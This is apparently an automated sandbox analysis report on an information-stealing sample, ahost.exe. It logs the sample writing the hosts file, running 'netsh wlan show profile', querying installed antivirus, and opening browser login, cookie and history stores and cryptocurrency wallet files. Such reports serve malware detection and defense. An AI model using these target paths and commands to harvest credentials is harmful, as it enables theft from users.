              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91ED080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7F91ED080
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F9205C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7F9205C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,104_2_00007FF7CF8C48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\ahost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7272, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR
              Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.wallet
              Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: ahost.exe, 00000002.00000002.1871989503.000002162C890000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430dJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.defaultJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
